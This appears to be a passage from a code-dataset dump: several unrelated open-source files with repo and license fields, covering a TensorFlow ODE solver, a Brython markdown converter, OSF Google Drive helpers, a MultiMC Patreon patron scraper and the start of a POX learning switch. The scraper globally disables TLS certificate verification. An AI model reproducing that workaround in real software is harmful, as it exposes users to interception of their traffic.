self.fetch_update()
else:
self.info_uptodate()
self.finish_fetch()
def on_LinkActivated(self, url):
"""
Open external link in browser.
.. note:: This method is the slot responses to the signal from a Label
widget while the text with a hyperlink which is clicked by user.
"""
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url)) | gpl-3.0 |
koobonil/Boss2D | Boss2D/addon/tensorflow-1.2.1_for_boss/tensorflow/contrib/integrate/python/ops/odes.py | 69 | 20508 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""ODE solvers for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import tensor_array_ops
_ButcherTableau = collections.namedtuple(
'_ButcherTableau', 'alpha beta c_sol c_mid c_error')
# Parameters from Shampine (1986), section 4.
_DORMAND_PRINCE_TABLEAU = _ButcherTableau(
alpha=[1/5, 3/10, 4/5, 8/9, 1., 1.],
beta=[[1/5],
[3/40, 9/40],
[44/45, -56/15, 32/9],
[19372/6561, -25360/2187, 64448/6561, -212/729],
[9017/3168, -355/33, 46732/5247, 49/176, -5103/18656],
[35/384, 0, 500/1113, 125/192, -2187/6784, 11/84]],
c_sol=[35/384, 0, 500/1113, 125/192, -2187/6784, 11/84, 0],
c_mid=[6025192743/30085553152 / 2, 0, 51252292925/65400821598 / 2,
-2691868925/45128329728 / 2, 187940372067/1594534317056 / 2,
-1776094331/19743644256 / 2, 11237099/235043384 / 2],
c_error=[1951/21600 - 35/384,
0,
22642/50085 - 500/1113,
451/720 - 125/192,
-12231/42400 - -2187/6784,
649/6300 - 11/84,
1/60],
)
def _possibly_nonzero(x):
return isinstance(x, ops.Tensor) or x != 0
def _scaled_dot_product(scale, xs, ys, name=None):
"""Calculate a scaled, vector inner product between lists of Tensors."""
with ops.name_scope(name, 'scaled_dot_product', [scale, xs, ys]) as scope:
# Some of the parameters in our Butcher tableau include zeros. Using
# _possibly_nonzero lets us avoid wasted computation.
return math_ops.add_n([(scale * x) * y for x, y in zip(xs, ys)
if _possibly_nonzero(x) or _possibly_nonzero(y)],
name=scope)
def _dot_product(xs, ys, name=None):
"""Calculate the vector inner product between two lists of Tensors."""
with ops.name_scope(name, 'dot_product', [xs, ys]) as scope:
return math_ops.add_n([x * y for x, y in zip(xs, ys)], name=scope)
def _runge_kutta_step(func, y0, f0, t0, dt, tableau=_DORMAND_PRINCE_TABLEAU,
name=None):
"""Take an arbitrary Runge-Kutta step and estimate error.
Args:
func: Function to evaluate like `func(y, t)` to compute the time derivative
of `y`.
y0: Tensor initial value for the state.
f0: Tensor initial value for the derivative, computed from `func(y0, t0)`.
t0: float64 scalar Tensor giving the initial time.
dt: float64 scalar Tensor giving the size of the desired time step.
tableau: optional _ButcherTableau describing how to take the Runge-Kutta
step.
name: optional name for the operation.
Returns:
Tuple `(y1, f1, y1_error, k)` giving the estimated function value after
the Runge-Kutta step at `t1 = t0 + dt`, the derivative of the state at `t1`,
estimated error at `t1`, and a list of Runge-Kutta coefficients `k` used for
calculating these terms.
"""
with ops.name_scope(name, 'runge_kutta_step', [y0, f0, t0, dt]) as scope:
y0 = ops.convert_to_tensor(y0, name='y0')
f0 = ops.convert_to_tensor(f0, name='f0')
t0 = ops.convert_to_tensor(t0, name='t0')
dt = ops.convert_to_tensor(dt, name='dt')
dt_cast = math_ops.cast(dt, y0.dtype)
k = [f0]
for alpha_i, beta_i in zip(tableau.alpha, tableau.beta):
ti = t0 + alpha_i * dt
yi = y0 + _scaled_dot_product(dt_cast, beta_i, k)
k.append(func(yi, ti))
if not (tableau.c_sol[-1] == 0 and tableau.c_sol == tableau.beta[-1]):
# This property (true for Dormand-Prince) lets us save a few FLOPs.
yi = y0 + _scaled_dot_product(dt_cast, tableau.c_sol, k)
y1 = array_ops.identity(yi, name='%s/y1' % scope)
f1 = array_ops.identity(k[-1], name='%s/f1' % scope)
y1_error = _scaled_dot_product(dt_cast, tableau.c_error, k,
name='%s/y1_error' % scope)
return (y1, f1, y1_error, k)
def _interp_fit(y0, y1, y_mid, f0, f1, dt):
"""Fit coefficients for 4th order polynomial interpolation.
Args:
y0: function value at the start of the interval.
y1: function value at the end of the interval.
y_mid: function value at the mid-point of the interval.
f0: derivative value at the start of the interval.
f1: derivative value at the end of the interval.
dt: width of the interval.
Returns:
List of coefficients `[a, b, c, d, e]` for interpolating with the polynomial
`p = a * x ** 4 + b * x ** 3 + c * x ** 2 + d * x + e` for values of `x`
between 0 (start of interval) and 1 (end of interval).
"""
# a, b, c, d, e = sympy.symbols('a b c d e')
# x, dt, y0, y1, y_mid, f0, f1 = sympy.symbols('x dt y0 y1 y_mid f0 f1')
# p = a * x ** 4 + b * x ** 3 + c * x ** 2 + d * x + e
# sympy.solve([p.subs(x, 0) - y0,
# p.subs(x, 1 / 2) - y_mid,
# p.subs(x, 1) - y1,
# (p.diff(x) / dt).subs(x, 0) - f0,
# (p.diff(x) / dt).subs(x, 1) - f1],
# [a, b, c, d, e])
# {a: -2.0*dt*f0 + 2.0*dt*f1 - 8.0*y0 - 8.0*y1 + 16.0*y_mid,
# b: 5.0*dt*f0 - 3.0*dt*f1 + 18.0*y0 + 14.0*y1 - 32.0*y_mid,
# c: -4.0*dt*f0 + dt*f1 - 11.0*y0 - 5.0*y1 + 16.0*y_mid,
# d: dt*f0,
# e: y0}
a = _dot_product([-2 * dt, 2 * dt, -8, -8, 16], [f0, f1, y0, y1, y_mid])
b = _dot_product([5 * dt, -3 * dt, 18, 14, -32], [f0, f1, y0, y1, y_mid])
c = _dot_product([-4 * dt, dt, -11, -5, 16], [f0, f1, y0, y1, y_mid])
d = dt * f0
e = y0
return [a, b, c, d, e]
def _interp_fit_rk(y0, y1, k, dt, tableau=_DORMAND_PRINCE_TABLEAU):
"""Fit an interpolating polynomial to the results of a Runge-Kutta step."""
with ops.name_scope('interp_fit_rk'):
dt = math_ops.cast(dt, y0.dtype)
y_mid = y0 + _scaled_dot_product(dt, tableau.c_mid, k)
f0 = k[0]
f1 = k[-1]
return _interp_fit(y0, y1, y_mid, f0, f1, dt)
def _interp_evaluate(coefficients, t0, t1, t):
"""Evaluate polynomial interpolation at the given time point.
Args:
coefficients: list of Tensor coefficients as created by `interp_fit`.
t0: scalar float64 Tensor giving the start of the interval.
t1: scalar float64 Tensor giving the end of the interval.
t: scalar float64 Tensor giving the desired interpolation point.
Returns:
Polynomial interpolation of the coefficients at time `t`.
"""
with ops.name_scope('interp_evaluate'):
t0 = ops.convert_to_tensor(t0)
t1 = ops.convert_to_tensor(t1)
t = ops.convert_to_tensor(t)
dtype = coefficients[0].dtype
assert_op = control_flow_ops.Assert(
(t0 <= t) & (t <= t1),
['invalid interpolation, fails `t0 <= t <= t1`:', t0, t, t1])
with ops.control_dependencies([assert_op]):
x = math_ops.cast((t - t0) / (t1 - t0), dtype)
xs = [constant_op.constant(1, dtype), x]
for _ in range(2, len(coefficients)):
xs.append(xs[-1] * x)
return _dot_product(coefficients, reversed(xs))
def _optimal_step_size(last_step,
error_ratio,
safety=0.9,
ifactor=10.0,
dfactor=0.2,
order=5,
name=None):
"""Calculate the optimal size for the next Runge-Kutta step."""
with ops.name_scope(
name, 'optimal_step_size', [last_step, error_ratio]) as scope:
error_ratio = math_ops.cast(error_ratio, last_step.dtype)
exponent = math_ops.cast(1 / order, last_step.dtype)
# this looks more complex than necessary, but importantly it keeps
# error_ratio in the numerator so we can't divide by zero:
factor = math_ops.maximum(
1 / ifactor,
math_ops.minimum(error_ratio ** exponent / safety, 1 / dfactor))
return math_ops.div(last_step, factor, name=scope)
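# Worked example for _optimal_step_size above (comments only), using the
# default arguments safety=0.9, ifactor=10.0, dfactor=0.2, order=5:
#   error_ratio = 2.0  -> factor = max(0.1, min(2**0.2 / 0.9, 5.0)) ~= 1.28,
#                         so the next step is last_step / 1.28 (~22% smaller);
#   error_ratio -> 0   -> factor bottoms out at 1/ifactor = 0.1,
#                         so the step grows by at most a factor of 10;
#   error_ratio >> 1   -> factor is capped at 1/dfactor = 5.0,
#                         so the step shrinks by at most a factor of 5.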
def _abs_square(x):
if x.dtype.is_complex:
return math_ops.square(math_ops.real(x)) + math_ops.square(math_ops.imag(x))
else:
return math_ops.square(x)
def _ta_append(tensor_array, value):
"""Append a value to the end of a tf.TensorArray."""
return tensor_array.write(tensor_array.size(), value)
class _RungeKuttaState(collections.namedtuple(
'_RungeKuttaState', 'y1, f1, t0, t1, dt, interp_coeff')):
"""Saved state of the Runge Kutta solver.
Attributes:
y1: Tensor giving the function value at the end of the last time step.
f1: Tensor giving derivative at the end of the last time step.
t0: scalar float64 Tensor giving start of the last time step.
t1: scalar float64 Tensor giving end of the last time step.
dt: scalar float64 Tensor giving the size for the next time step.
interp_coef: list of Tensors giving coefficients for polynomial
interpolation between `t0` and `t1`.
"""
class _History(collections.namedtuple(
'_History', 'integrate_points, error_ratio')):
"""Saved integration history for use in `info_dict`.
Attributes:
integrate_points: tf.TensorArray storing integrating time points.
error_ratio: tf.TensorArray storing computed error ratios at each
integration step.
"""
def _dopri5(func,
y0,
t,
rtol,
atol,
full_output=False,
first_step=None,
safety=0.9,
ifactor=10.0,
dfactor=0.2,
max_num_steps=1000,
name=None):
"""Solve an ODE for `odeint` using method='dopri5'."""
if first_step is None:
# at some point, we might want to switch to picking the step size
# automatically
first_step = 1.0
with ops.name_scope(
name, 'dopri5',
[y0, t, rtol, atol, safety, ifactor, dfactor, max_num_steps]) as scope:
first_step = ops.convert_to_tensor(first_step, dtype=t.dtype,
name='first_step')
safety = ops.convert_to_tensor(safety, dtype=t.dtype, name='safety')
ifactor = ops.convert_to_tensor(ifactor, dtype=t.dtype, name='ifactor')
dfactor = ops.convert_to_tensor(dfactor, dtype=t.dtype, name='dfactor')
max_num_steps = ops.convert_to_tensor(max_num_steps, dtype=dtypes.int32,
name='max_num_steps')
def adaptive_runge_kutta_step(rk_state, history, n_steps):
"""Take an adaptive Runge-Kutta step to integrate the ODE."""
y0, f0, _, t0, dt, interp_coeff = rk_state
with ops.name_scope('assertions'):
check_underflow = control_flow_ops.Assert(
t0 + dt > t0, ['underflow in dt', dt])
check_max_num_steps = control_flow_ops.Assert(
n_steps < max_num_steps, ['max_num_steps exceeded'])
check_numerics = control_flow_ops.Assert(
math_ops.reduce_all(math_ops.is_finite(abs(y0))),
['non-finite values in state `y`', y0])
with ops.control_dependencies(
[check_underflow, check_max_num_steps, check_numerics]):
y1, f1, y1_error, k = _runge_kutta_step(func, y0, f0, t0, dt)
with ops.name_scope('error_ratio'):
# We use the same approach as the dopri5 fortran code.
error_tol = atol + rtol * math_ops.maximum(abs(y0), abs(y1))
tensor_error_ratio = _abs_square(y1_error) / _abs_square(error_tol)
# Could also use reduce_maximum here.
error_ratio = math_ops.sqrt(math_ops.reduce_mean(tensor_error_ratio))
accept_step = error_ratio <= 1
with ops.name_scope('update/rk_state'):
# If we don't accept the step, the _RungeKuttaState will be useless
# (covering a time-interval of size 0), but that's OK, because in such
# cases we always immediately take another Runge-Kutta step.
y_next = control_flow_ops.cond(accept_step, lambda: y1, lambda: y0)
f_next = control_flow_ops.cond(accept_step, lambda: f1, lambda: f0)
t_next = control_flow_ops.cond(accept_step, lambda: t0 + dt, lambda: t0)
interp_coeff = control_flow_ops.cond(
accept_step,
lambda: _interp_fit_rk(y0, y1, k, dt),
lambda: interp_coeff)
dt_next = _optimal_step_size(dt, error_ratio, safety, ifactor, dfactor)
rk_state = _RungeKuttaState(
y_next, f_next, t0, t_next, dt_next, interp_coeff)
with ops.name_scope('update/history'):
history = _History(_ta_append(history.integrate_points, t0 + dt),
_ta_append(history.error_ratio, error_ratio))
return rk_state, history, n_steps + 1
def interpolate(solution, history, rk_state, i):
"""Interpolate through the next time point, integrating as necessary."""
with ops.name_scope('interpolate'):
rk_state, history, _ = control_flow_ops.while_loop(
lambda rk_state, *_: t[i] > rk_state.t1,
adaptive_runge_kutta_step,
(rk_state, history, 0),
name='integrate_loop')
y = _interp_evaluate(
rk_state.interp_coeff, rk_state.t0, rk_state.t1, t[i])
solution = solution.write(i, y)
return solution, history, rk_state, i + 1
assert_increasing = control_flow_ops.Assert(
math_ops.reduce_all(t[1:] > t[:-1]),
['`t` must be monotonic increasing'])
with ops.control_dependencies([assert_increasing]):
num_times = array_ops.size(t)
solution = tensor_array_ops.TensorArray(
y0.dtype, size=num_times).write(0, y0)
history = _History(
integrate_points=tensor_array_ops.TensorArray(
t.dtype, size=0, dynamic_size=True),
error_ratio=tensor_array_ops.TensorArray(
rtol.dtype, size=0, dynamic_size=True))
rk_state = _RungeKuttaState(
y0, func(y0, t[0]), t[0], t[0], first_step, interp_coeff=[y0] * 5)
solution, history, _, _ = control_flow_ops.while_loop(
lambda _, __, ___, i: i < num_times,
interpolate,
(solution, history, rk_state, 1),
name='interpolate_loop')
y = solution.stack(name=scope)
y.set_shape(t.get_shape().concatenate(y0.get_shape()))
if not full_output:
return y
else:
integrate_points = history.integrate_points.stack()
info_dict = {'num_func_evals': 6 * array_ops.size(integrate_points) + 1,
'integrate_points': integrate_points,
'error_ratio': history.error_ratio.stack()}
return (y, info_dict)
def odeint(func,
y0,
t,
rtol=1e-6,
atol=1e-12,
method=None,
options=None,
full_output=False,
name=None):
"""Integrate a system of ordinary differential equations.
Solves the initial value problem for a non-stiff system of first order ode-s:
```
dy/dt = func(y, t), y(t[0]) = y0
```
where y is a Tensor of any shape.
For example:
```
# solve `dy/dt = -y`, corresponding to exponential decay
tf.contrib.integrate.odeint(lambda y, _: -y, 1.0, [0, 1, 2])
=> [1, exp(-1), exp(-2)]
```
Output dtypes and numerical precision are based on the dtypes of the inputs
`y0` and `t`.
Currently, implements 5th order Runge-Kutta with adaptive step size control
and dense output, using the Dormand-Prince method. Similar to the 'dopri5'
method of `scipy.integrate.ode` and MATLAB's `ode45`.
Based on: Shampine, Lawrence F. (1986), "Some Practical Runge-Kutta Formulas",
Mathematics of Computation, American Mathematical Society, 46 (173): 135-150,
doi:10.2307/2008219
Args:
func: Function that maps a Tensor holding the state `y` and a scalar Tensor
`t` into a Tensor of state derivatives with respect to time.
y0: N-D Tensor giving starting value of `y` at time point `t[0]`. May
have any floating point or complex dtype.
t: 1-D Tensor holding a sequence of time points for which to solve for
`y`. The initial time point should be the first element of this sequence,
and each time must be larger than the previous time. May have any floating
point dtype. If not provided as a Tensor, converted to a Tensor with
float64 dtype.
rtol: optional float64 Tensor specifying an upper bound on relative error,
per element of `y`.
atol: optional float64 Tensor specifying an upper bound on absolute error,
per element of `y`.
method: optional string indicating the integration method to use. Currently,
the only valid option is `'dopri5'`.
options: optional dict of configuring options for the indicated integration
method. Can only be provided if a `method` is explicitly set. For
`'dopri5'`, valid options include:
* first_step: an initial guess for the size of the first integration
(current default: 1.0, but may later be changed to use heuristics based
on the gradient).
* safety: safety factor for adaptive step control, generally a constant
in the range 0.8-1 (default: 0.9).
* ifactor: maximum factor by which the adaptive step may be increased
(default: 10.0).
      * dfactor: maximum factor by which the adaptive step may be decreased
(default: 0.2).
* max_num_steps: integer maximum number of integrate steps between time
points in `t` (default: 1000).
full_output: optional boolean. If True, `odeint` returns a tuple
`(y, info_dict)` describing the integration process.
name: Optional name for this operation.
Returns:
y: (N+1)-D tensor, where the first dimension corresponds to different
time points. Contains the solved value of y for each desired time point in
`t`, with the initial value `y0` being the first element along the first
dimension.
info_dict: only if `full_output == True`. A dict with the following values:
* num_func_evals: integer Tensor counting the number of function
evaluations.
* integrate_points: 1D float64 Tensor with the upper bound of each
integration time step.
* error_ratio: 1D float Tensor with the estimated ratio of the integration
      error to the error tolerance at each integration step. A ratio greater
than 1 corresponds to rejected steps.
Raises:
ValueError: if an invalid `method` is provided.
TypeError: if `options` is supplied without `method`, or if `t` or `y0` has
an invalid dtype.
"""
if method is not None and method != 'dopri5':
raise ValueError('invalid method: %r' % method)
if options is None:
options = {}
elif method is None:
raise ValueError('cannot supply `options` without specifying `method`')
with ops.name_scope(name, 'odeint', [y0, t, rtol, atol]) as scope:
# TODO(shoyer): use nest.flatten (like tf.while_loop) to allow `y0` to be an
# arbitrarily nested tuple. This will help performance and usability by
# avoiding the need to pack/unpack in user functions.
y0 = ops.convert_to_tensor(y0, name='y0')
if not (y0.dtype.is_floating or y0.dtype.is_complex):
raise TypeError('`y0` must have a floating point or complex floating '
'point dtype')
t = ops.convert_to_tensor(t, preferred_dtype=dtypes.float64, name='t')
if not t.dtype.is_floating:
raise TypeError('`t` must have a floating point dtype')
error_dtype = abs(y0).dtype
rtol = ops.convert_to_tensor(rtol, dtype=error_dtype, name='rtol')
atol = ops.convert_to_tensor(atol, dtype=error_dtype, name='atol')
return _dopri5(func, y0, t,
rtol=rtol,
atol=atol,
full_output=full_output,
name=scope,
**options)
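# Illustrative usage sketch (comments only; the usual TF 1.x graph/session
# pattern is assumed). Solves dy/dt = -y and inspects the solver diagnostics:
#
#   t = constant_op.constant([0., 1., 2.], dtype=dtypes.float64)
#   y, info = odeint(lambda y, t: -y, 1.0, t, rtol=1e-8, atol=1e-10,
#                    method='dopri5', options={'max_num_steps': 500},
#                    full_output=True)
#   # After evaluating in a session: y ~= [1., exp(-1), exp(-2)] and
#   # info['num_func_evals'] reports the integration cost.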
| mit |
2014c2g4/2015cda0623 | static/Brython3.1.1-20150328-091302/Lib/markdown2.py | 669 | 8143 | import browser.html
import re
class URL:
def __init__(self,src):
elts = src.split(maxsplit=1)
self.href = elts[0]
self.alt = ''
if len(elts)==2:
alt = elts[1]
if alt[0]=='"' and alt[-1]=='"':self.alt=alt[1:-1]
elif alt[0]=="'" and alt[-1]=="'":self.alt=alt[1:-1]
elif alt[0]=="(" and alt[-1]==")":self.alt=alt[1:-1]
class CodeBlock:
def __init__(self,line):
self.lines = [line]
def to_html(self):
if self.lines[0].startswith("`"):
self.lines.pop(0)
res = escape('\n'.join(self.lines))
res = unmark(res)
res = '<pre class="marked">%s</pre>\n' %res
return res,[]
class Marked:
def __init__(self, line=''):
self.line = line
self.children = []
def to_html(self):
return apply_markdown(self.line)
# get references
refs = {}
ref_pattern = r"^\[(.*)\]:\s+(.*)"
def mark(src):
global refs
refs = {}
# split source in sections
# sections can be :
# - a block-level HTML element (markdown syntax will not be processed)
# - a script
# - a span-level HTML tag (markdown syntax will be processed)
# - a code block
# normalise line feeds
src = src.replace('\r\n','\n')
# lines followed by dashes
src = re.sub(r'(.*?)\n=+\n', '\n# \\1\n', src)
src = re.sub(r'(.*?)\n-+\n', '\n## \\1\n', src)
lines = src.split('\n')
i = bq = 0
ul = ol = 0
while i<len(lines):
# enclose lines starting by > in a blockquote
if lines[i].startswith('>'):
nb = 1
while nb<len(lines[i]) and lines[i][nb]=='>':
nb += 1
lines[i] = lines[i][nb:]
if nb>bq:
lines.insert(i,'<blockquote>'*(nb-bq))
i += 1
bq = nb
elif nb<bq:
lines.insert(i,'</blockquote>'*(bq-nb))
i += 1
bq = nb
elif bq>0:
lines.insert(i,'</blockquote>'*bq)
i += 1
bq = 0
# unordered lists
if lines[i].strip() and lines[i].lstrip()[0] in '-+*' \
and (i==0 or ul or not lines[i-1].strip()):
print('is ul',lines[i])
# line indentation indicates nesting level
nb = 1+len(lines[i])-len(lines[i].lstrip())
lines[i] = '<li>'+lines[i][1+nb:]
if nb>ul:
lines.insert(i,'<ul>'*(nb-ul))
i += 1
elif nb<ul:
lines.insert(i,'</ul>'*(ul-nb))
i += 1
ul = nb
elif ul:
lines.insert(i,'</ul>'*ul)
i += 1
ul = 0
# ordered lists
mo = re.search(r'^(\d+\.)',lines[i])
if mo:
if not ol:
lines.insert(i,'<ol>')
i += 1
lines[i] = '<li>'+lines[i][len(mo.groups()[0]):]
ol = 1
elif ol:
lines.insert(i,'</ol>')
i += 1
ol = 0
i += 1
sections = []
scripts = []
section = Marked()
i = 0
while i<len(lines):
line = lines[i]
if line.strip() and line.startswith(' '):
if isinstance(section,Marked) and section.line:
sections.append(section)
section = CodeBlock(line[4:])
j = i+1
while j<len(lines) and lines[j].strip() \
and lines[j].startswith(' '):
section.lines.append(lines[j][4:])
j += 1
sections.append(section)
section = Marked()
i = j
continue
elif line.lower().startswith('<script'):
if isinstance(section,Marked) and section.line:
sections.append(section)
section = Marked()
j = i+1
while j<len(lines):
if lines[j].lower().startswith('</script>'):
scripts.append('\n'.join(lines[i+1:j]))
for k in range(i,j+1):
lines[k] = ''
break
j += 1
i = j
continue
else:
mo = re.search(ref_pattern,line)
if mo is not None:
if isinstance(section,Marked) and section.line:
sections.append(section)
section = Marked()
key = mo.groups()[0]
value = URL(mo.groups()[1])
refs[key.lower()] = value
else:
if line.strip():
if section.line:
section.line += ' '
section.line += line
else:
sections.append(section)
section = Marked()
i += 1
res = ''
for section in sections:
mk,_scripts = section.to_html()
res += '<p>'+mk+'\n'
scripts += _scripts
return res,scripts
def escape(czone):
czone = czone.replace('&','&amp;')
czone = czone.replace('<','&lt;')
czone = czone.replace('>','&gt;')
return czone
def s_escape(mo):
# used in re.sub
czone = mo.string[mo.start():mo.end()]
return escape(czone)
def unmark(code_zone):
# convert _ to &#95; inside inline code
code_zone = code_zone.replace('_','&#95;')
return code_zone
def s_unmark(mo):
# convert _ to &#95; inside inline code
code_zone = mo.string[mo.start():mo.end()]
code_zone = code_zone.replace('_','&#95;')
return code_zone
def apply_markdown(src):
scripts = []
# replace \` by &#96;
src = re.sub(r'\\\`','&#96;',src)
# escape < > & in inline code
code_pattern = r'\`(\S.*?\S)\`'
src = re.sub(code_pattern,s_escape,src)
# also convert _
src = re.sub(code_pattern,s_unmark,src)
# inline links
link_pattern1 = r'\[(.+?)\]\s?\((.+?)\)'
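# matches inline links written as [link text](http://example.com)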
def repl(mo):
g1,g2 = mo.groups()
g2 = re.sub('_','&#95;',g2)
return '<a href="%s">%s</a>' %(g2,g1)
src = re.sub(link_pattern1,repl,src)
# reference links
link_pattern2 = r'\[(.+?)\]\s?\[(.*?)\]'
while True:
mo = re.search(link_pattern2,src)
if mo is None:break
text,key = mo.groups()
print(text,key)
if not key:key=text # implicit link name
if key.lower() not in refs:
raise KeyError('unknown reference %s' %key)
url = refs[key.lower()]
repl = '<a href="'+url.href+'"'
if url.alt:
repl += ' title="'+url.alt+'"'
repl += '>%s</a>' %text
src = re.sub(link_pattern2,repl,src,count=1)
# emphasis
# replace \* by &#42;
src = re.sub(r'\\\*','&#42;',src)
# replace \_ by &#95;
src = re.sub(r'\\\_','&#95;',src)
# _ and * surrounded by spaces are not markup
src = re.sub(r' _ ',' &#95; ',src)
src = re.sub(r' \* ',' &#42; ',src)
strong_patterns = [('STRONG',r'\*\*(.*?)\*\*'),('B',r'__(.*?)__')]
for tag,strong_pattern in strong_patterns:
src = re.sub(strong_pattern,r'<%s>\1</%s>' %(tag,tag),src)
em_patterns = [('EM',r'\*(.*?)\*'),('I',r'\_(.*?)\_')]
for tag,em_pattern in em_patterns:
src = re.sub(em_pattern,r'<%s>\1</%s>' %(tag,tag),src)
# inline code
# replace \` by &#96;
src = re.sub(r'\\\`','&#96;',src)
code_pattern = r'\`(.*?)\`'
src = re.sub(code_pattern,r'<code>\1</code>',src)
# ordered lists
lines = src.split('\n')
atx_header_pattern = '^(#+)(.*)(#*)'
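# e.g. a line such as "### Section" is turned into an <H3> heading below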
for i,line in enumerate(lines):
print('line [%s]' %line, line.startswith('#'))
mo = re.search(atx_header_pattern,line)
if not mo:continue
print('pattern matches')
level = len(mo.groups()[0])
lines[i] = re.sub(atx_header_pattern,
'<H%s>%s</H%s>\n' %(level,mo.groups()[1],level),
line,count=1)
src = '\n'.join(lines)
src = re.sub('\n\n+','\n<p>',src)+'\n'
return src,scripts
| gpl-3.0 |
ticklemepierce/osf.io | website/addons/googledrive/utils.py | 8 | 2493 | # -*- coding: utf-8 -*-
"""Utility functions for the Google Drive add-on.
"""
import os
import logging
from urllib import quote
logger = logging.getLogger(__name__)
class GoogleDriveNodeLogger(object):
"""Helper class for adding correctly-formatted Google Drive logs to nodes.
Usage: ::
from website.project.model import NodeLog
node = ...
auth = ...
nodelogger = GoogleDriveNodeLogger(node, auth)
nodelogger.log(NodeLog.FILE_REMOVED, save=True)
:param Node node: The node to add logs to
:param Auth auth: Authorization of the person who did the action.
"""
def __init__(self, node, auth, path=None):
self.node = node
self.auth = auth
self.path = path
def log(self, action, extra=None, save=False):
"""Log an event. Wraps the Node#add_log method, automatically adding
relevant parameters and prefixing log events with `"googledrive_"`.
:param str action: Log action. Should be a class constant from NodeLog.
:param dict extra: Extra parameters to add to the ``params`` dict of the
new NodeLog.
"""
params = {
'project': self.node.parent_id,
'node': self.node._primary_key,
'folder': self.node.get_addon('googledrive', deleted=True).folder_path
}
if extra:
params.update(extra)
# Prefix the action with googledrive
self.node.add_log(
action="googledrive_{0}".format(action),
params=params,
auth=self.auth
)
if save:
self.node.save()
def build_googledrive_urls(item, node, path):
return {
'fetch': node.api_url_for('googledrive_folders', folderId=item['id']),
'folders': node.api_url_for('googledrive_folders', folderId=item['id'], path=path),
}
def to_hgrid(item, node, path):
"""
:param item: contents returned from Google Drive API
:return: results formatted as required for Hgrid display
"""
# quote fails on unicode objects with unicode characters
# convert to str with .encode('utf-8')
safe_name = quote(item['title'].encode('utf-8'), safe='')
path = os.path.join(path, safe_name)
serialized = {
'path': path,
'id': item['id'],
'kind': 'folder',
'name': safe_name,
'addon': 'googledrive',
'urls': build_googledrive_urls(item, node, path=path)
}
return serialized
| apache-2.0 |
MultiMC/PatronScraper2 | patronscraper.py | 1 | 1625 | #!/usr/bin/env python2
from lxml import html
import requests
from operator import methodcaller
import sys
import boto
from boto.s3.key import Key
import ssl
# See: https://github.com/boto/boto/issues/2836
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
page = requests.get('https://www.patreon.com/user?u=130816&ty=p')
if page.status_code == requests.codes.ok:
# determine new patrons
tree = html.fromstring(page.text)
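# the XPath below collects the title attribute of every <a> whose class list
# contains 'favesHover'; those titles carry the patron names on the page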
patrons_extracted = tree.xpath("//a[contains(concat(' ', normalize-space(@class), ' '), ' favesHover ')]/@title")
new_patrons = filter(None, map(methodcaller("strip"), patrons_extracted))
try:
new_patrons.remove(u'');
except ValueError:
pass # do nothing!
# determine old patrons
conn = boto.connect_s3(validate_certs=False)
bucket = conn.get_bucket('files.multimc.org')
k = Key(bucket)
k.key = 'patrons.txt'
old_patrons = k.get_contents_as_string().decode('utf-8').split('\n')
old_patrons.sort(key=lambda y: y.lower())
try:
old_patrons.remove(u'');
except ValueError:
pass # do nothing!
# merge lists
patrons = new_patrons + list(set(old_patrons) - set(new_patrons))
patrons.sort(key=lambda y: y.lower())
# print
old_patron_text = "\n".join(old_patrons) + "\n"
patron_text = "\n".join(patrons) + "\n"
print old_patron_text
print "New:"
print patron_text
# upload to s3
k.set_metadata('Content-Type', 'application/json')
k.set_contents_from_string(patron_text)
sys.exit(0)
sys.exit(1)
| apache-2.0 |
PrincetonUniversity/AdvNet-OF_Scripts | evaluation/switch/flowmod_test/pox/pox/samples/l2_polling.py | 1 | 6809 | # Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
An L2 learning switch.
It is derived from one written live for an SDN crash course.
It is somewhat similar to NOX's pyswitch in that it installs
exact-match rules for each flow.
"""
from __future__ import division
from random import randrange
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str
from pox.lib.util import str_to_bool
import sys, os, commands, time
from pox.lib.util import dpidToStr
log = core.getLogger()
#-------------------------------define flow rate----------
flow_rate = 50
interval = 1/flow_rate
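# with flow_rate = 50 and true division (imported above), interval is 0.02 s,
# i.e. the sleep between successive flow_mod messages sent further down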
print 'current flow modification rate is:', flow_rate
global burst
burst = {}
# We don't want to flood immediately when a switch connects.
# Can be overriden on commandline.
_flood_delay = 0
class LearningSwitch (object):
"""
The learning switch "brain" associated with a single OpenFlow switch.
When we see a packet, we'd like to output it on a port which will
eventually lead to the destination. To accomplish this, we build a
table that maps addresses to ports.
We populate the table by observing traffic. When we see a packet
from some source coming from some port, we know that source is out
that port.
When we want to forward traffic, we look up the destination in our
table. If we don't know the port, we simply send the message out
all ports except the one it came in on. (In the presence of loops,
this is bad!).
In short, our algorithm looks like this:
For each packet from the switch:
1) Use source address and switch port to update address/port table
2) Is transparent = False and either Ethertype is LLDP or the packet's
destination address is a Bridge Filtered address?
Yes:
2a) Drop packet -- don't forward link-local traffic (LLDP, 802.1x)
DONE
3) Is destination multicast?
Yes:
3a) Flood the packet
DONE
4) Port for destination address in our address/port table?
No:
4a) Flood the packet
DONE
5) Is output port the same as input port?
Yes:
5a) Drop packet and similar ones for a while
6) Install flow table entry in the switch so that this
flow goes out the appropriate port
6a) Send the packet out appropriate port
"""
def __init__ (self, connection, transparent):
